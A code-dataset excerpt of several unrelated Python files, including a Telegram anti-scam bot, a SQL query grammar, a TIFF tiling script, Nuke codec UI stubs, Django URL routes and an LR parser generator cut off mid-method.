status.trace)\n\n def entrypoint(self):\n self.io_manager.setup()\n self.params.test.test(self.params)","repo_name":"spwilson2/flimsy","sub_path":"flimsy/sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34613057610","text":"import telegram, time, os, glob\r\nfrom telegram.ext import *\r\nfrom telegram import Update\r\nfrom difflib import SequenceMatcher\r\n\r\nTOKEN = \"YOUR TOKEN HERE\"\r\nSIMILARITY_RATE = 85\r\n\r\nasync def start_callback(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\r\n await update.message.reply_markdown_v2(\"Hey \\! Moi C'estCiaoBot\\. 🫡\\nAjoute moi dans un groupe ou un channel et *mets\\-moi administrateur*, je supprimerai les messages de scams selon\" +\r\n \" ma liste interne configurée\\.\\n📊 Taux de sensibilité configuré : \" + str(SIMILARITY_RATE) + \"%\")\r\n\r\nasync def analyze_msg(update, context):\r\n msg = update.effective_message\r\n text = msg.text\r\n for forbidden_text in retrieve_forbidden_messages():\r\n if get_string_similarity(forbidden_text, text) >= SIMILARITY_RATE:\r\n await msg.delete()\r\n print(\"- SPAM DETECTED - message removed\")\r\n user = msg.from_user\r\n if user is not None:\r\n print(\"-> User ID : \" + str(user.id))\r\n print(\"-> Username : \" + user.username)\r\n print(\"------------------------------\")\r\n\r\ndef retrieve_forbidden_messages():\r\n files = glob.glob(os.path.join(\"forbidden-messages\", \"*.txt\"))\r\n file_contents = []\r\n for file in files:\r\n with open(file, 'r', encoding=\"utf-8\") as f:\r\n content = f.read()\r\n file_contents.append(content)\r\n return file_contents\r\n\r\ndef get_string_similarity(string1, string2):\r\n matcher = SequenceMatcher(None, string1, string2)\r\n similarity = matcher.ratio() * 100\r\n return similarity\r\n\r\nif not os.path.exists(\"forbidden-messages\"):\r\n os.makedirs(\"forbidden-messages\")\r\n\r\napplication = Application.builder().token(TOKEN).build()\r\nprint(\"|----------------------------------------------|\")\r\nprint(\"| C'estCiaoBot CONNECTED - Created by KeyKatyu |\")\r\nprint(\"|------- https://github.com/KeyKatyu ----------|\")\r\nprint(\"|----------------------------------------------|\")\r\napplication.add_handler(CommandHandler(\"start\", start_callback))\r\napplication.add_handler(MessageHandler(filters.TEXT, analyze_msg))\r\napplication.run_polling()","repo_name":"KeyKatyu/cestciaobot","sub_path":"github-bot.py","file_name":"github-bot.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"36941115415","text":"\nimport tatsu\nimport json\n\nfrom gbd_core.database import Database, DatabaseException\n\nclass ParserException(Exception):\n pass\n\nclass Parser:\n GRAMMAR = r'''\n @@grammar::GBDQuery\n @@ignorecase::True\n\n start \n = \n q:query $ \n ;\n\n query \n = \n | left:query qop:(\"and\" | \"or\") ~ right:query \n | constraint \n | \"(\" q:query \")\" \n ;\n\n constraint \n = \n | col:(dbname \":\" column | column) cop:(\"=\" | \"!=\") str:string \n | col:(dbname \":\" column | column) cop:(\"=\" | \"!=\" | \"<=\" | \">=\" | \"<\" | \">\" ) ter:termstart\n | col:(dbname \":\" column | column) cop:(\"like\" | \"unlike\") ~ lik:([\"%\"] string [\"%\"])\n ;\n\n termstart \n = \n t:term\n ;\n\n term \n = \n | left:(term | termend) top:(\"+\" | \"-\" | \"*\" | \"/\") right:(term | termend)\n | (\"(\") t:(term | termend) (\")\")\n | constant:number\n ;\n\n termend\n =\n col:(dbname \":\" column | column)\n ;\n\n number = /[-]?[0-9]+[.]?[0-9]*/ ;\n string = /[a-zA-Z0-9_\\.\\-\\/\\,\\:\\+\\=\\@]+/ ;\n column = /[a-zA-Z][a-zA-Z0-9_]*/ ;\n dbname = /[a-zA-Z][a-zA-Z0-9_]*/ ;\n '''\n\n\n model = tatsu.compile(GRAMMAR)\n\n\n def __init__(self, query, verbose=False):\n try:\n self.ast = Parser.model.parse(query) if query else dict()\n if verbose:\n print(\"Parsed: \" + query)\n print(json.dumps(tatsu.util.asjson(self.ast), indent=2))\n except tatsu.exceptions.FailedParse as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n except tatsu.exceptions.FailedLeftRecursion as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n\n\n def get_features(self, ast=None):\n #import pprint\n #pp = pprint.PrettyPrinter(depth=6)\n #pp.pprint(ast)\n try:\n ast = ast if ast else self.ast\n if \"q\" in ast:\n return self.get_features(ast[\"q\"])\n elif \"t\" in ast:\n return self.get_features(ast[\"t\"])\n elif \"qop\" in ast or \"top\" in ast:\n return self.get_features(ast[\"left\"]) | self.get_features(ast[\"right\"])\n elif \"cop\" in ast and \"ter\" in ast:\n return { \"\".join(ast[\"col\"]) } | self.get_features(ast[\"ter\"])\n elif \"col\" in ast:\n return { \"\".join(ast[\"col\"]) }\n else: \n return set()\n except TypeError as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n\n\n def get_sql(self, db: Database, ast=None):\n try:\n ast = ast if ast else self.ast\n if \"q\" in ast:\n return \"(\" + self.get_sql(db, ast[\"q\"]) + \")\"\n elif \"t\" in ast:\n return \"(\" + self.get_sql(db, ast[\"t\"]) + \")\"\n elif \"qop\" in ast or \"top\" in ast: # query operator or term operator\n operator = ast[\"qop\"] if ast[\"qop\"] else ast[\"top\"]\n left = self.get_sql(db, ast[\"left\"])\n right = self.get_sql(db, ast[\"right\"])\n return \"{} {} {}\".format(left, operator, right)\n elif \"cop\" in ast: # constraint operator\n operator = \"not like\" if ast[\"cop\"] == \"unlike\" else ast[\"cop\"]\n feat = db.faddr(\"\".join(ast[\"col\"]))\n feat_is_1_n = db.find(\"\".join(ast[\"col\"])).default is None\n if \"str\" in ast: # cop:(\"=\" | \"!=\")\n if feat_is_1_n:\n table = db.faddr_table(\"\".join(ast[\"col\"]))\n setop = \"IN\" if ast[\"cop\"] == \"=\" else \"NOT IN\"\n return \"{t}.hash {o} (SELECT {t}.hash FROM {t} WHERE {f} = '{s}')\".format(o=setop, t=table, f=feat, s=ast[\"str\"])\n else:\n return \"{} {} '{}'\".format(feat, operator, ast[\"str\"])\n elif \"lik\" in ast: # cop:(\"like\" | \"unlike\")\n if feat_is_1_n:\n table = db.faddr_table(\"\".join(ast[\"col\"]))\n setop = \"IN\" if ast[\"cop\"] == \"like\" else \"NOT IN\"\n return \"{t}.hash {o} (SELECT {t}.hash FROM {t} WHERE {f} like '{s}')\".format(o=setop, t=table, f=feat, s=\"\".join([ t for t in ast[\"lik\"] if t ]))\n else:\n return \"{} {} '{}'\".format(feat, operator, \"\".join([ t for t in ast[\"lik\"] if t ]))\n elif \"ter\" in ast: # cop:(\"=\" | \"!=\" | \"<=\" | \">=\" | \"<\" | \">\" )\n if feat_is_1_n and ast[\"cop\"] == \"!=\":\n table = db.faddr_table(\"\".join(ast[\"col\"]))\n setop = \"NOT IN\" if ast[\"cop\"] == \"!=\" else \"IN\"\n cop = \"=\" if ast[\"cop\"] == \"!=\" else ast[\"cop\"]\n return \"{t}.hash {o} (SELECT {t}.hash FROM {t} WHERE CAST({f} AS FLOAT) {c} {s})\".format(o=setop, c=cop, t=table, f=feat, s=self.get_sql(db, ast[\"ter\"]))\n else:\n return \"CAST({} AS FLOAT) {} {}\".format(feat, operator, self.get_sql(db, ast[\"ter\"]))\n raise ParserException(\"Missing right-hand side of constraint\")\n elif \"col\" in ast:\n feature = db.faddr(\"\".join(ast[\"col\"]))\n return \"CAST({} AS FLOAT)\".format(feature)\n elif \"constant\" in ast:\n return ast[\"constant\"]\n else:\n return \"1=1\"\n except TypeError as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n except DatabaseException as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n\n","repo_name":"Udopia/gbd","sub_path":"gbd_core/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"68"} +{"seq_id":"5488217719","text":"# Import necessary libraries\r\nimport os\r\nfrom PIL import Image\r\nfrom osgeo import gdal\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\n# Set the input and output directories\r\ninput_dir = r\"C:\\Users\\Administrator\\Desktop\\tif_dataset\\airport_MUX\"\r\noutput_dir = r\"C:\\Users\\Administrator\\Desktop\\tif_dataset\\OUTPUT\"\r\n\r\n# Set the desired size of each sub-image\r\nsub_image_size = 128\r\n\r\n# Loop through each TIFF image in the input directory\r\nfor filename in os.listdir(input_dir):\r\n if filename.endswith('.tif'):\r\n # Open the image using PIL\r\n image = cv2.imread(os.path.join(input_dir, filename))\r\n dataset = gdal.Open(os.path.join(input_dir, filename))\r\n geotransform = dataset.GetGeoTransform()\r\n print(\"------------------------\",os.path.join(input_dir,filename))\r\n print(geotransform)\r\n # Calculate the coordinates of the four corners of the image\r\n # ulx = geotransform[0]\r\n # uly = geotransform[3]\r\n # Get the dimensions of the image\r\n cols=dataset.RasterXSize\r\n rows=dataset.RasterYSize\r\n \r\n # Calculate the number of sub-images in each dimension\r\n num_tiles_cols =int(np.ceil(cols/sub_image_size))\r\n num_tiles_rows =int(np.ceil(rows/sub_image_size))\r\n\r\n # 创建一个大的数组容纳图像,如果边界不够则填充\r\n # 1。计算填充的边界\r\n pad_cols=num_tiles_cols*sub_image_size-cols\r\n pad_rows=num_tiles_rows*sub_image_size-rows\r\n\r\n img_arr=np.array(image)\r\n\r\n new_img_arr=np.zeros((int(rows+pad_rows),int(cols+pad_cols),3),dtype=img_arr.dtype)\r\n\r\n # 将原始图像平移并保存在新的数组\r\n new_img_arr[0:rows,0:cols,]=img_arr\r\n print('rows:',rows,'\\t','cols:',cols) \r\n # Loop through each sub-image\r\n for i in range(0,rows,sub_image_size):\r\n num=0\r\n for j in range(0,cols,sub_image_size):\r\n print('i:',i,'\\t','j:',j,'\\t','num:',num)\r\n # Calculate the coordinates of the sub-image\r\n x_left=dataset.GetGeoTransform()[0]+j*dataset.GetGeoTransform()[1]\r\n y_top=dataset.GetGeoTransform()[3]+j*dataset.GetGeoTransform()[5]\r\n print((x_left,y_top,geotransform[1]))\r\n # Crop the sub-image using PIL\r\n # sub_image = image.crop((left, upper, right, lower))\r\n block=new_img_arr[i:i+sub_image_size,j:j+sub_image_size]\r\n\r\n #保存块\r\n tile_img=Image.fromarray(block)\r\n \r\n # Save the sub-image as a TIFF file\r\n sub_image_filename = os.path.splitext(filename)[0] + '_{}_{}_{}.tiff'.format(x_left,y_top,geotransform[1])\r\n tile_img.save(os.path.join(output_dir, sub_image_filename))\r\n num=num+1","repo_name":"ArcFYB/2JPG_Tools","sub_path":"tiff_split_saveinfo.py","file_name":"tiff_split_saveinfo.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19634769076","text":"import copy\n\nimport nuke_internal as nuke\nimport PySide2.QtCore as QtCore\nimport PySide2.QtWidgets as QtWidgets\nfrom hiero.ui.FnUIProperty import UIPropertyFactory\nfrom hiero.ui.FnTaskUIFormLayout import TaskUIFormLayout\nfrom hiero.ui.FnNodePropertyWidget import NodePropertyWidget\n\nkEXRTooltips = {\n 'metadata': ('Which metadata to write out to the EXR file.'\n \"

        'no metadata' means that no custom attributes will be created and only metadata that fills required header fields will be written.

        'default metadata' means that the optional timecode, edgecode, frame rate and exposure header fields will also be filled using metadata values.\"),\n 'noprefix': (\"By default unknown metadata keys have the prefix 'nuke' attached to them before writing them into the file. Enable this option to write the metadata 'as is' without the nuke prefix.\"),\n 'interleave': ('Which groups to interleave in the EXR data.'\n \"

        'interleave channels, layers and views' for backwards compatibility. \"\n 'This writes all the channels to a single part ensuring compatibility with earlier versions of Nuke.

        '\n \"

        'interleave channels and layers' for forwards compatibility. \"\n 'This creates a multi-part file optimised for size.

        '\n \"

        'interleave channels' to resolve layers into separate parts. \"\n 'This creates a multi-part file optimized for read performance.

        '\n 'For full compatibility with versions of Nuke using OpenEXR 1.x '\n \"'truncate channel names' should be used to ensure that channels \"\n 'do not overflow the name buffer.'),\n 'standard_layer_name_format': ('Older versions of Nuke write out channel names in the format: view.layer.channel. '\n 'Check this option to follow the EXR standard format: layer.view.channel'),\n 'write_full_layer_names': ('Older versions of Nuke just stored the layer name in the part '\n 'name of multi-part files. Check this option to always write the '\n 'layer name in the channel names following the EXR standard.'),\n 'truncateChannelNames': ('Truncate channel names to a maximum of 31 characters for backwards compatibility'),\n 'write_ACES_compliant_EXR': ('Write out an ACES compliant EXR file')\n\n}\n# Tooltips for codec properties. Currently only some of the mov encoder property tooltips are defined.\nkCodecTooltips = {\n 'exr': kEXRTooltips\n}\n\n\nclass CodecUIController(QtWidgets.QWidget):\n \"\"\"CodecUIController is the base class used to control the widgets for specific Codecs.\n This allows to customize layout of the widgets and signals and slots\"\"\"\n propertyChanged = QtCore.Signal()\n\n def __init__(self, file_type, propertyDictionaries, presetDictionary):\n QtWidgets.QWidget.__init__(self)\n self._file_type = file_type\n self._widgets = []\n self.initializeUI(propertyDictionaries, presetDictionary)\n\n def connectProperty(self, propertyWidget):\n \"\"\"reimplement this to allow setup custom signals and slots\"\"\"\n propertyWidget.propertyChanged.connect(self.propertyChanged)\n\n def getTooltip(self, label, propertyKey):\n # Create the tooltip. This matches how tooltips appear from knob widgets. Adding the HTML markup\n # also has the effect of making Qt apply wrapping to the text.\n tooltip = '' + label + ''\n tooltipsForCodec = kCodecTooltips.get(self._file_type, dict())\n propertyTooltip = tooltipsForCodec.get(propertyKey, None)\n if propertyTooltip is not None:\n tooltip = tooltip + '
        ' + propertyTooltip\n return tooltip\n\n def getLabelAndProperty(self, propertyKey):\n label = propertyKey\n # If key is not a string, assume its a tupe containing (label, key)\n if not isinstance(propertyKey, str):\n label, propertyKey = propertyKey\n return label, propertyKey\n\n def initializeUI(self, propertyDictionaries, presetDictionary):\n \"\"\"Creates all the properties from the propertyDictionaries\"\"\"\n layout = TaskUIFormLayout()\n self.setLayout(layout)\n for properties in propertyDictionaries:\n # Flatten dictionary into tupes of keyvalue pairs\n for (propertyKey, propertyValue) in properties.items():\n label, propertyKey = self.getLabelAndProperty(propertyKey)\n tooltip = self.getTooltip(label, propertyKey)\n propertyWidget = UIPropertyFactory.create(type(\n propertyValue), key=propertyKey, value=propertyValue, dictionary=presetDictionary, label=label, tooltip=tooltip)\n if propertyWidget is not None:\n # Force the widget to commit its value back to the preset. This\n # ensures that the property values are stored in the preset even if\n # the user hasn't changed them from the defaults. Mixing this with\n # the UI is not ideal, but the property widgets do already have all\n # the logic for determining the defaults and writing them to the\n # preset.\n propertyWidget.update(commit=True)\n self.connectProperty(propertyWidget)\n layout.addRow(propertyWidget._label + ':', propertyWidget)\n\n\nclass EXRCodecUIController(CodecUIController):\n kDataType = 'datatype'\n kCompression = 'compression'\n kCompressionLevel = 'dw_compression_level'\n kMetadata = 'metadata'\n kPrefix = 'noprefix'\n kInterleave = 'interleave'\n kLayerNameFormat = 'standard_layer_name_format'\n kFullLayerNames = 'write_full_layer_names'\n kTruncateChannelNames = 'truncateChannelNames'\n kWriteACESCompliantEXR = 'write_ACES_compliant_EXR'\n\n def __init__(self, file_type, propertyDictionaries, presetDictionary):\n CodecUIController.__init__(self, 'exr', propertyDictionaries, presetDictionary)\n\n def createProperty(self, properties, propertyKey, presetDictionary):\n label, propertyValue = properties[propertyKey]\n tooltip = self.getTooltip(label, propertyKey)\n propertyWidget = UIPropertyFactory.create(type(\n propertyValue), key=propertyKey, value=propertyValue, dictionary=presetDictionary, label=label, tooltip=tooltip)\n propertyWidget.update(commit=True)\n self.connectProperty(propertyWidget)\n return propertyWidget\n\n def initializeUI(self, propertyDictionaries, presetDictionary):\n \"\"\"Creates all the properties from the propertyDictionaries\"\"\"\n properties = dict()\n # construct a dictionary of tuples (label,propertyValue)\n for prop in propertyDictionaries:\n # Flatten dictionary into tupes of keyvalue pairs\n for (propertyKey, propertyValue) in prop.items():\n label, propertyKey = self.getLabelAndProperty(propertyKey)\n properties[propertyKey] = (label, propertyValue)\n\n layout = TaskUIFormLayout()\n self.setLayout(layout)\n\n # datatype\n widget = self.createProperty(properties, self.kDataType, presetDictionary)\n layout.addRow(widget._label + ':', widget)\n\n # compression\n widget = self.createProperty(properties, self.kCompression, presetDictionary)\n layout.addRow(widget._label + ':', widget)\n self._compressionWidget = widget\n\n widget = self.createProperty(properties, self.kCompressionLevel, presetDictionary)\n layout.addRow(widget._label + ':', widget)\n self._compressionLevelWidget = widget\n self.compressionChanged()\n\n # metadata\n self._writeACESCompliantEXRWidget = self.createProperty(\n properties, self.kWriteACESCompliantEXR, presetDictionary)\n layout.addRow(self._writeACESCompliantEXRWidget._label +\n ':', self._writeACESCompliantEXRWidget)\n\n metadataWidget = self.createProperty(properties, self.kMetadata, presetDictionary)\n prefixWidget = self.createProperty(properties, self.kPrefix, presetDictionary)\n self._metadataWidget = metadataWidget\n self._prefixWidget = prefixWidget\n layout.addMultiWidgetRow((metadataWidget._label, prefixWidget._label),\n (metadataWidget, prefixWidget))\n self.metadataChanged()\n\n # interleaving\n self._interleavingWidget = self.createProperty(\n properties, self.kInterleave, presetDictionary)\n self._standardLayerNameWidget = self.createProperty(\n properties, self.kLayerNameFormat, presetDictionary)\n self._fullLayerNamesWidget = self.createProperty(\n properties, self.kFullLayerNames, presetDictionary)\n self._truncateLayerNamesWidget = self.createProperty(\n properties, self.kTruncateChannelNames, presetDictionary)\n layout.addRow(self._interleavingWidget._label+':', self._interleavingWidget)\n layout.addRow(self._standardLayerNameWidget._label +\n ':', self._standardLayerNameWidget)\n layout.addRow(self._fullLayerNamesWidget._label+':', self._fullLayerNamesWidget)\n layout.addRow(self._truncateLayerNamesWidget._label +\n ':', self._truncateLayerNamesWidget)\n self.interleaveChanged()\n\n # Slots\n\n def compressionChanged(self):\n layout = self.layout()\n text = self._compressionWidget._widget.currentText()\n if 'DWA' in text:\n layout.setWidgetVisible(self._compressionLevelWidget, True)\n else:\n layout.setWidgetVisible(self._compressionLevelWidget, False)\n self.propertyChanged.emit()\n\n def interleaveChanged(self):\n layout = self.layout()\n index = self._interleavingWidget._widget.currentIndex()\n if index == 0:\n layout.setWidgetEnabled(self._standardLayerNameWidget, True)\n layout.setWidgetEnabled(self._fullLayerNamesWidget, False)\n layout.setWidgetEnabled(self._truncateLayerNamesWidget, True)\n elif index == 1:\n layout.setWidgetEnabled(self._standardLayerNameWidget, True)\n layout.setWidgetEnabled(self._fullLayerNamesWidget, False)\n layout.setWidgetEnabled(self._truncateLayerNamesWidget, False)\n elif index == 2:\n layout.setWidgetEnabled(self._standardLayerNameWidget, True)\n layout.setWidgetEnabled(self._fullLayerNamesWidget, True)\n layout.setWidgetEnabled(self._truncateLayerNamesWidget, False)\n self.propertyChanged.emit()\n\n def metadataChanged(self):\n layout = self.layout()\n text = self._metadataWidget._widget.currentText()\n if 'all' in text:\n layout.setWidgetEnabled(self._prefixWidget, True)\n else:\n layout.setWidgetEnabled(self._prefixWidget, False)\n self.propertyChanged.emit()\n\n def connectProperty(self, propertyWidget):\n if propertyWidget._label == 'compression':\n propertyWidget.propertyChanged.connect(self.compressionChanged)\n elif propertyWidget._label == 'interleave':\n propertyWidget.propertyChanged.connect(self.interleaveChanged)\n elif propertyWidget._label == 'metadata':\n propertyWidget.propertyChanged.connect(self.metadataChanged)\n else:\n propertyWidget.propertyChanged.connect(self.propertyChanged)\n\n\nclass WriteNodePropertyWidget(NodePropertyWidget):\n \"\"\"NodePropertyWidget subclass that creates property widgets for a write node with the\n passed in fileType.\"\"\"\n\n def __init__(self, fileType, propertyDictionaries, presetDictionary):\n self._writeNode = nuke.createNode('Write', '', False)\n fileTypeKnob = self._writeNode.knobs()['file_type']\n fileTypeKnob.setValue(fileType)\n\n NodePropertyWidget.__init__(self, self._writeNode,\n propertyDictionaries, presetDictionary)\n\n def __del__(self):\n nuke.delete(self._writeNode)\n","repo_name":"sisoe24/nuke-python-stubs","sub_path":"stubs/hiero/ui/FnCodecUIController.py","file_name":"FnCodecUIController.py","file_ext":"py","file_size_in_byte":12143,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"21029286595","text":"from django.conf import settings\nfrom django.urls import path, register_converter\n\nfrom grandchallenge.serving.views import (\n serve_component_interface_value,\n serve_images,\n serve_session_feedback_screenshot,\n serve_structured_challenge_submission_form,\n serve_submissions,\n)\n\napp_name = \"serving\"\n\n\nclass PrefixConverter:\n regex = r\"[0-9a-fA-F]{2}\"\n\n def to_python(self, value):\n return str(value)\n\n def to_url(self, value):\n return str(value)\n\n\nregister_converter(PrefixConverter, \"prefix\")\n\nurlpatterns = [\n path(\n f\"{settings.IMAGE_FILES_SUBDIRECTORY}//\",\n serve_images,\n ),\n path(\n f\"{settings.IMAGE_FILES_SUBDIRECTORY}////\",\n serve_images,\n ),\n path(\n (\n f\"{settings.EVALUATION_FILES_SUBDIRECTORY}/\"\n f\"/\"\n f\"submissions/\"\n f\"/\"\n f\"/\"\n f\"\"\n ),\n serve_submissions,\n ),\n path(\n (\n f\"{settings.COMPONENTS_FILES_SUBDIRECTORY}/\"\n f\"componentinterfacevalue/\"\n f\"/\"\n f\"/\"\n f\"/\"\n f\"\"\n ),\n serve_component_interface_value,\n ),\n path(\n (\n \"challenges/\"\n \"challengerequest/\"\n \"/\"\n \"\"\n ),\n serve_structured_challenge_submission_form,\n ),\n path(\n \"session-feedback//\",\n serve_session_feedback_screenshot,\n ),\n]\n","repo_name":"comic/grand-challenge.org","sub_path":"app/grandchallenge/serving/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"68"} +{"seq_id":"71356367577","text":"\"\"\"\nSimple algorithm that re-implements the Segmentor segment function\n\nThis module is a placeholder to indicate how to use the segmentation\nplugin architecture.\n\"\"\"\nfrom __future__ import print_function, absolute_import\nfrom DVIDSparkServices.reconutils.Segmentor import Segmentor\n\nclass precomputedpipeline(Segmentor):\n\n def segment(self, subvols, gray_vols=None):\n \"\"\"\n Does not require the gray vols\n \"\"\"\n # read pre-computed segmentation\n\n pathloc = self.segmentor_config[\"segpath\"]\n \n def _segment(subvolume):\n z1 = subvolume.box.z1\n y1 = subvolume.box.y1\n x1 = subvolume.box.x1\n\n fileloc = (pathloc + \"/%d_%d_%d.h5\") % (z1,y1,x1)\n import h5py\n import numpy\n print(\"!!\", fileloc)\n try:\n hfile = h5py.File(fileloc, 'r')\n seg = numpy.array(hfile[\"segmentation\"])\n print(\"!! good\")\n return seg.astype(numpy.uint32)\n except:\n print(\"!! bad\")\n return numpy.zeros((552,552,552), numpy.uint32)\n\n # preserver partitioner\n return subvols.map(_segment, True)\n","repo_name":"janelia-flyem/DVIDSparkServices","sub_path":"DVIDSparkServices/reconutils/plugins/precomputedpipeline.py","file_name":"precomputedpipeline.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"1778062245","text":"import logging\nfrom .baselex import EPS, EOF\nfrom ..common import Token\nfrom .common import ParserException, ParserGenerationException\n\n\nclass Action:\n def __eq__(self, other):\n return str(self) == str(other)\n\n\nclass Shift(Action):\n \"\"\" Shift over the next token and go to the given state \"\"\"\n\n def __init__(self, to_state):\n self.to_state = to_state\n\n def __repr__(self):\n return \"Shift({})\".format(self.to_state)\n\n\nclass Reduce(Action):\n \"\"\" Reduce according to the given rule \"\"\"\n\n def __init__(self, rule):\n self.rule = rule\n\n def __repr__(self):\n return \"Reduce({})\".format(self.rule)\n\n\nclass Accept(Action):\n def __init__(self, rule):\n self.rule = rule\n\n def __repr__(self):\n return \"Accept({})\".format(self.rule)\n\n\nclass Item:\n \"\"\"\n Represents a partially parsed item\n It has a production it is looking for, a position\n in this production called the 'dot' and a look ahead\n symbol that must follow this item.\n \"\"\"\n\n def __init__(self, production, dotpos, look_ahead):\n self.production = production\n self.dotpos = dotpos\n assert self.dotpos <= len(self.production.symbols)\n self.look_ahead = look_ahead\n self.is_shift = self.dotpos < len(self.production.symbols)\n if self.is_shift:\n self.Next = self.production.symbols[self.dotpos]\n self._data = (self.production, self.dotpos, self.look_ahead)\n self._hash = self._data.__hash__()\n\n def __eq__(self, other):\n if type(other) is type(self):\n return self._data == other._data\n return False\n\n def __hash__(self):\n return self._hash\n\n @property\n def is_reduce(self):\n \"\"\" Check if this item has the dot at the end \"\"\"\n return not self.is_shift\n\n def can_shift_over(self, symbol):\n \"\"\" Determines if this item can shift over the given symbol \"\"\"\n return self.is_shift and self.Next == symbol\n\n def shifted(self):\n \"\"\" Creates a new item that is shifted one position \"\"\"\n return Item(self.production, self.dotpos + 1, self.look_ahead)\n\n @property\n def NextNext(self):\n \"\"\" Gets the symbol after the next symbol, or EPS if at the end \"\"\"\n if self.dotpos + 1 >= len(self.production.symbols):\n return EPS\n else:\n return self.production.symbols[self.dotpos + 1]\n\n def __repr__(self):\n prod = self.production\n predot = \" \".join(prod.symbols[0 : self.dotpos])\n postdot = \" \".join(prod.symbols[self.dotpos :])\n args = (prod.name, predot, postdot, self.look_ahead)\n return \"[{} -> {} . {} -> {}]\".format(*args)\n\n\nclass State:\n \"\"\"A state in the parsing machine. A state contains a set of items and\n a state number\"\"\"\n\n def __init__(self, items, number):\n self.items = items\n self.number = number\n self.actions = {}\n\n\nclass LrParser:\n \"\"\"LR parser automata. This class takes goto and action table\n and can then process a sequence of tokens.\n \"\"\"\n\n def __init__(self, grammar, action_table, goto_table):\n self.action_table = action_table\n self.goto_table = goto_table\n self.grammar = grammar\n\n def parse(self, lexer):\n \"\"\" Parse an iterable with tokens \"\"\"\n assert hasattr(lexer, \"next_token\")\n stack = [0]\n r_data_stack = []\n look_ahead = lexer.next_token()\n assert type(look_ahead) is Token\n\n # TODO: exit on this condition:\n while stack != [0, self.grammar.start_symbol, 0]:\n state = stack[-1] # top of stack\n key = (state, look_ahead.typ)\n if key not in self.action_table:\n raise ParserException(\n \"Error parsing at character {0}\".format(look_ahead)\n )\n action = self.action_table[key]\n if isinstance(action, Reduce):\n f_args = []\n prod = self.grammar.productions[action.rule]\n for s in prod.symbols:\n stack.pop()\n stack.pop()\n f_args.append(r_data_stack.pop())\n f_args.reverse()\n r_data = None\n if prod.f:\n r_data = prod.f(*f_args)\n state = stack[-1]\n stack.append(prod.name)\n stack.append(self.goto_table[(state, prod.name)])\n r_data_stack.append(r_data)\n elif isinstance(action, Shift):\n stack.append(look_ahead.typ)\n stack.append(action.to_state)\n r_data_stack.append(look_ahead)\n look_ahead = lexer.next_token()\n assert type(look_ahead) is Token\n elif isinstance(action, Accept):\n # Pop last rule data off the stack:\n f_args = []\n param = self.grammar.productions[action.rule]\n for s in param.symbols:\n stack.pop()\n stack.pop()\n f_args.append(r_data_stack.pop())\n f_args.reverse()\n if param.f:\n ret_val = param.f(*f_args)\n else:\n ret_val = None\n # Break out!\n stack.append(param.name)\n stack.append(0)\n break\n # At exit, the stack must be 1 long\n # TODO: fix that this holds:\n # assert stack == [0, self.grammar.start_symbol, 0]\n return ret_val\n\n\ndef calculate_first_sets(grammar):\n \"\"\"\n Calculate first sets for each grammar symbol\n This is a dictionary which maps each grammar symbol\n to a set of terminals that can be encountered first\n when looking for the symbol.\n \"\"\"\n first = {}\n nullable = {}\n for terminal in grammar.terminals | {EOF, EPS}:\n first[terminal] = set([terminal])\n nullable[terminal] = False\n\n for nt in grammar.nonterminals:\n first[nt] = set()\n nullable[nt] = False\n\n while True:\n some_change = False\n for rule in grammar.productions:\n # Check for null-ability:\n if all(nullable[beta] for beta in rule.symbols):\n if not nullable[rule.name]:\n nullable[rule.name] = True\n some_change = True\n\n # Update first sets:\n for beta in rule.symbols:\n if not nullable[beta]:\n if first[beta] - first[rule.name]:\n first[rule.name] |= first[beta]\n some_change = True\n break\n if not some_change:\n break\n return first\n\n\nclass LrParserBuilder:\n \"\"\"\n Construct goto and action tables according to LALR algorithm\n \"\"\"\n\n def __init__(self, grammar):\n self.logger = logging.getLogger(\"pcc\")\n self.grammar = grammar\n self._first = None # Cached first set\n\n # Work data structures:\n self.action_table = {}\n self.goto_table = {}\n\n @property\n def first(self):\n \"\"\"\n The first set is a mapping from a grammar symbol to a set of\n set of all terminal symbols that can be the first terminal when\n looking for the grammar symbol\n \"\"\"\n if not self._first:\n self._first = calculate_first_sets(self.grammar)\n return self._first\n\n def closure(self, itemset):\n \"\"\" Expand itemset by using epsilon moves \"\"\"\n worklist = list(itemset)\n\n def addIt(itm):\n if itm not in itemset:\n itemset.add(itm)\n worklist.append(itm)\n\n def first2(itm):\n # When using the first sets, create a copy:\n f = set(self.first[itm.NextNext])\n if EPS in f:\n f.discard(EPS)\n f.add(itm.look_ahead)\n return f\n\n # Start of algorithm:\n while worklist:\n item = worklist.pop(0)\n if not item.is_shift:\n continue\n if item.Next not in self.grammar.nonterminals:\n continue\n\n C = item.Next\n for add_p in self.grammar.productions_for_name(C):\n for b in first2(item):\n addIt(Item(add_p, 0, b))\n return frozenset(itemset)\n\n def initial_item_set(self):\n \"\"\" Calculates the initial item set \"\"\"\n iis = set()\n for p in self.grammar.productions_for_name(self.grammar.start_symbol):\n iis.add(Item(p, 0, EOF))\n return self.closure(iis)\n\n def next_item_set(self, itemset, symbol):\n \"\"\"\n Determines the next itemset for the current set and a symbol\n This is the goto procedure\n \"\"\"\n next_set = set()\n for item in itemset:\n if item.can_shift_over(symbol):\n next_set.add(item.shifted())\n return self.closure(next_set)\n\n def generate_parser(self):\n \"\"\" Generates 